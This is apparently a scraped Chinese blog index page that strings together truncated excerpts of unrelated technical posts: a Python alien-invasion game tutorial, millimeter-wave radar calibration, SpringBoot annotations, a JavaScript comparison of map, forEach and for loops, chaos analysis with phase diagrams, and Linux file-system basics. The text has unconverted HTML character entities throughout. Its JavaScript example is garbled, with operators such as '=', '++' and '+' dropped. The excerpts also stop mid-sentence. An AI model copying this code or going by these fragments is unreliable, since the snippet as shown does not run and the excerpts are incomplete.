外星人入侵&#xff08;七&#xff09; 1.射杀外星人1.1 检测子弹与外星人的碰撞1.2 为测试创建大子弹1.3 生成新的外星人群1.4 提高子弹的速度1.5 重构_update_bullets() 2.结束游戏2.1 检测外星人和飞船碰撞2.2 响应外星人和飞船碰撞2.3 有外星人到达屏幕底端2.4 游戏结束 3.…

毫米波雷达(三):实操

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 一、福相一致性校准二、速度解模糊其他 一、福相一致性校准 多波束天线通道幅相一致性校正及实现 https://www.docin.com/p-2640129630.html 二、速度解模糊 一种…

SpringBoot的@ConfigurationProperties、@Autowired、@Conditional注解

目录 1. ConfigurationProperties EnableConfigurationProperties Autowired注解1.1 configuration自定义配置参数自动补全功能 2. Conditional注解 1. ConfigurationProperties EnableConfigurationProperties Autowired注解 在resources/application.properties文件中&a…

map、foreach 和 for ,多角度对比

for 1.访问元素和操作方式------通过索引访问数组元素&#xff0c;并可以执行任意操作。 const numbers [1, 2, 3, 4, 5];// for循环示例 for (let i 0; i < numbers.length; i) {console.log("Number (for loop): " numbers[i]); } 2.索引控制--------通过…

非线性系统的混沌特性分析方法--相图/分岔图分析法

非线性系统的混沌特性分析方法–相图/分岔图分析法 ​ 混沌映射被用于生成混沌序列&#xff0c;这是一种由简单的确定性系统产生的随机性序列。一般混沌序列具有以下主要特征&#xff1a; 非线性&#xff1b;对初值的敏感依赖性&#xff1b;遍历性&#xff1b;随机性&#xf…

【Linux初阶】基础IO - 磁盘 文件系统

&#x1f31f;hello&#xff0c;各位读者大大们你们好呀&#x1f31f; &#x1f36d;&#x1f36d;系列专栏&#xff1a;【Linux初阶】 ✒️✒️本篇内容&#xff1a;认识磁盘&#xff08;物理结构、储存结构、逻辑结构、读取单位&#xff09;&#xff0c;理解文件系统&#xf…